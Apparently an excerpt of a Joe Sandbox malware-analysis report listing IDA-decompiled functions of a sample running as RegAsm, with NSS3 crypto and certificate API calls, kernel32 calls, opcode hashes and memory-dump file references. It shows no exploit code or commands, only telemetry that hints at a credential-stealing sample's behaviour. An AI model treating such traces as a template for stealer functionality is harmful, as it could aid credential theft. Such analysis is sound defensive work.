Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

SECOID_FindOID_Util.NSS3(?), ref: 6C154524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C154537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C154579

Part of subcall function 6C1541B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C1541BE
Part of subcall function 6C1541B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C1541E9
Part of subcall function 6C1541B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C154227
Part of subcall function 6C1541B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C15423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C15459C

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: ffc8c571e4ef57a24ede969458f679d5f0022cc01469f063cd04ade0dfdaec74
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: 2221F5F1721600DBEB10CE29AC44F6B37A89F51658F950428FD35CBB49E735E934C6A1

Function 6C15E5E0 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C15E755,00000000,00000004,?,?), ref: 6C15E5F5

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C15E62C
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C15E63E

Part of subcall function 6C1AF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C14F379,?,00000000,-00000002), ref: 6C1AF9B7

PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C15E65C

Part of subcall function 6C17DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C17DDEC
Part of subcall function 6C17DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C17DE70
Part of subcall function 6C17DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C17DE83
Part of subcall function 6C17DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C17DE95
Part of subcall function 6C17DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C17DEAE
Part of subcall function 6C17DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C17DEBB

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C15E68E

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
String ID:
API String ID: 2865137721-0
Opcode ID: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction ID: f863c91dbfee1d692cb62e60f8d28479030a492646ea928182645df95db1cdd8
Opcode Fuzzy Hash: a3a89b2af733e35b5063d925a0347e14bcb9d919b36c9b216162f5a6fb2f6e13
Instruction Fuzzy Hash: 212143B6F012116FFB004EA5DC80FAB77989F94288F954134ED3897A91EB24DE26C7D0

Function 6C15AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C153FFF,00000000,?,?,?,?,?,6C151A1C,00000000,00000000), ref: 6C15ADA7

Part of subcall function 6C1B14C0: TlsGetValue.KERNEL32 ref: 6C1B14E0
Part of subcall function 6C1B14C0: EnterCriticalSection.KERNEL32 ref: 6C1B14F5
Part of subcall function 6C1B14C0: PR_Unlock.NSS3 ref: 6C1B150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C153FFF,00000000,?,?,?,?,?,6C151A1C,00000000,00000000), ref: 6C15ADB4

Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B10F3
Part of subcall function 6C1B10C0: EnterCriticalSection.KERNEL32(?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B110C
Part of subcall function 6C1B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1141
Part of subcall function 6C1B10C0: PR_Unlock.NSS3(?,?,?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B1182
Part of subcall function 6C1B10C0: TlsGetValue.KERNEL32(?,6C158802,00000000,00000008,?,6C14EF74,00000000), ref: 6C1B119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C153FFF,?,?,?,?,6C153FFF,00000000,?,?,?,?,?,6C151A1C,00000000), ref: 6C15ADD5

Part of subcall function 6C1AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C1A8D2D,?,00000000,?), ref: 6C1AFB85
Part of subcall function 6C1AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C1AFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C2794B0,?,?,?,?,?,?,?,?,6C153FFF,00000000,?), ref: 6C15ADEC

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C153FFF), ref: 6C15AE3C

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: e8b7d58d1481a654fc06f30d6eefa79b283f24e6c435ae734987fda56689a80f
Instruction ID: bf5960a7a8c07be70fb1eea00ffce4e9cced068708d4e27f3df568a62fdb38cd
Opcode Fuzzy Hash: e8b7d58d1481a654fc06f30d6eefa79b283f24e6c435ae734987fda56689a80f
Instruction Fuzzy Hash: 211126B1E403095BE7109B65AC40BBF77F8DFA524CF444628EC2996741FB20E96986F2

Function 00425673 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425681
_free.LIBCMT ref: 00425694

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: f8af0394ab0ff4c3a2444634ad3a530f224ede5dcce15d97c79a546a7d09878d
Instruction ID: e7a4a8cdfed8422caa32aa717d0dc5cd55f742c26140548a77d42e843e90ca59
Opcode Fuzzy Hash: f8af0394ab0ff4c3a2444634ad3a530f224ede5dcce15d97c79a546a7d09878d
Instruction Fuzzy Hash: 7111C432B01A31EBCF212F75BC04A5E37A5AB443A5BE0453BF89D97250DA3CC980C69C

Function 6C1E04C0 Relevance: 7.6, APIs: 5, Instructions: 63synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C1E461B,-00000004), ref: 6C1E04DF
TlsGetValue.KERNEL32(?,00000000,?,6C1E461B,-00000004), ref: 6C1E0510
EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C1E0520
PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C1E461B,-00000004), ref: 6C1E0534
GetLastError.KERNEL32(?,6C1E461B,-00000004), ref: 6C1E0543

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
String ID:
API String ID: 3052423345-0
Opcode ID: 97f6ef24b878feb81c9c4fc5666bab751f2c6354e9cdc03f1769855b6a3821f2
Instruction ID: b745c682c04e3dae5afb776badf10d42e727fa52213a2acafb7c2f4961f43def
Opcode Fuzzy Hash: 97f6ef24b878feb81c9c4fc5666bab751f2c6354e9cdc03f1769855b6a3821f2
Instruction Fuzzy Hash: 6A113A71A04941EBDB007B789C08B6A37A4EF1A719F614624E825D39D0EF36D144DB91

Function 6C17CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C191E10: TlsGetValue.KERNEL32 ref: 6C191E36
Part of subcall function 6C191E10: EnterCriticalSection.KERNEL32(?,?,?,6C16B1EE,2404110F,?,?), ref: 6C191E4B
Part of subcall function 6C191E10: PR_Unlock.NSS3 ref: 6C191E76

free.MOZGLUE(?,6C17D079,00000000,00000001), ref: 6C17CDA5
PK11_FreeSymKey.NSS3(?,6C17D079,00000000,00000001), ref: 6C17CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C17D079,00000000,00000001), ref: 6C17CDCF
DeleteCriticalSection.KERNEL32(?,6C17D079,00000000,00000001), ref: 6C17CDE2
free.MOZGLUE(?), ref: 6C17CDE9

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: fdc59226ce0ea824a2b7334da3f2f74833eae34abcf5e8ceabc67b65bc55fb97
Instruction ID: 5894e88ce99b8c8e5b068acde0c515f8dda3cbdee1e7e756e66a3ec3dcd82d49
Opcode Fuzzy Hash: fdc59226ce0ea824a2b7334da3f2f74833eae34abcf5e8ceabc67b65bc55fb97
Instruction Fuzzy Hash: A011C2B2B01115ABDB10AFA5ED44A9AB77CFF14668B104131E91987E01E732E474C7E1

Function 6C1E2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C1E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C1E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1E2CEC

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C1E2D02
PR_EnterMonitor.NSS3(?), ref: 6C1E2D1F
PR_ExitMonitor.NSS3(?), ref: 6C1E2D42
PR_ExitMonitor.NSS3(?), ref: 6C1E2D5B

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 337556e06860fd5908fb4790ef81025ad737cc962595d8839bb4562ec949557d
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 3B01A5B19046055FE6309F26FC50BC7B7A1FB59318F004525EA5DC6B10E632E8258A92

Function 6C1E2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C1E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C1E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1E2D9C

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C1E2DB2
PR_EnterMonitor.NSS3(?), ref: 6C1E2DCF
PR_ExitMonitor.NSS3(?), ref: 6C1E2DF2
PR_ExitMonitor.NSS3(?), ref: 6C1E2E0B

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 3f52ac6d0ff2be0e032bc879ffc7270a9b137983324b0dd6780e5a52dc4f863d
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 7001A5B1904A055FE6309F25FC11BC7B7E1EB55318F000535EA5DC6B10D632E8258692

Function 6C17AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C163090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C17AE42), ref: 6C1630AA
Part of subcall function 6C163090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C1630C7
Part of subcall function 6C163090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C1630E5
Part of subcall function 6C163090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C163116
Part of subcall function 6C163090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C16312B
Part of subcall function 6C163090: PK11_DestroyObject.NSS3(?,?), ref: 6C163154
Part of subcall function 6C163090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C16317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C1599FF,?,?,?,?,?,?,?,?,?,6C152D6B,?), ref: 6C17AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C1599FF,?,?,?,?,?,?,?,?,?,6C152D6B,?), ref: 6C17AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C152D6B,?,?,00000000), ref: 6C17AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C152D6B,?,?,00000000), ref: 6C17AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C152D6B,?,?), ref: 6C17AEA3

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: cbb87b138cfef54fc67fa6db1f3e9640d216f13900743374c8d20a2f25abe495
Instruction ID: 9be741852188c0417ea816a00ed7392f2bd92d0d1532da0e379429d4d3a76edc
Opcode Fuzzy Hash: cbb87b138cfef54fc67fa6db1f3e9640d216f13900743374c8d20a2f25abe495
Instruction Fuzzy Hash: 3E01F467B0401057E721926CAC95BAF31588B9765CF091032E809D7B41FE1AC91943F3

Function 6C26ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C26A6D8), ref: 6C26AE0D
free.MOZGLUE(?), ref: 6C26AE14
DeleteCriticalSection.KERNEL32(6C26A6D8), ref: 6C26AE36
free.MOZGLUE(?), ref: 6C26AE3D
free.MOZGLUE(00000000,00000000,?,?,6C26A6D8), ref: 6C26AE47

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: c0096dfa0efe58bb9bec229c4867538039621a52e0a8db42ac5664c92a2135c4
Instruction ID: 26a08439736e50e5ea3b21efe76e7b27911aa49e74b937ac4db562395e4bf493
Opcode Fuzzy Hash: c0096dfa0efe58bb9bec229c4867538039621a52e0a8db42ac5664c92a2135c4
Instruction Fuzzy Hash: EBF0F675201A06A7CB009FE9E80CA1BB7B8BF86B75B100328F92A83981D733E011C7D1

Function 00426679 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426685

Part of subcall function 004248B4: __getptd_noexit.LIBCMT ref: 004248B7
Part of subcall function 004248B4: __amsg_exit.LIBCMT ref: 004248C4

__getptd.LIBCMT ref: 0042669C
__amsg_exit.LIBCMT ref: 004266AA
__lock.LIBCMT ref: 004266BA
__updatetlocinfoEx_nolock.LIBCMT ref: 004266CE

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 5c055fd9185f6f75510cf0675ce22e26a0bda8f43ed566cd41b29e02f0390111
Instruction ID: e1fd37c6afc224e530914e4f4a075e2af3fa8a51d392c429d40fe69670b30016
Opcode Fuzzy Hash: 5c055fd9185f6f75510cf0675ce22e26a0bda8f43ed566cd41b29e02f0390111
Instruction Fuzzy Hash: 75F06272F05770DAD611BB69780374977A0AF00728FA2011FE400A72D2CB6C5940DA9D

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042EB58: std::exception::exception.LIBCMT ref: 0042EB6D
Part of subcall function 0042EB58: __CxxThrowException@8.LIBCMT ref: 0042EB82
Part of subcall function 0042EB58: std::exception::exception.LIBCMT ref: 0042EB93

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: f247eef985d7f50871300a9e44c355eda40f261f53026d0913d6f574d9fd10d3
Instruction ID: 97022290231437a1f77ac5720d808b2b8a5c987e255abbc7ddd565fabea3a599
Opcode Fuzzy Hash: f247eef985d7f50871300a9e44c355eda40f261f53026d0913d6f574d9fd10d3
Instruction Fuzzy Hash: 8431E932B403259BDB08EF69AC466DDB7A65704311F11016FE520E7264D6BE8AC08B48

Function 00411007 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00411048
GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
wsprintfA.USER32 ref: 004110DB

Strings

|hC, xrefs: 0041110A

Memory Dump Source

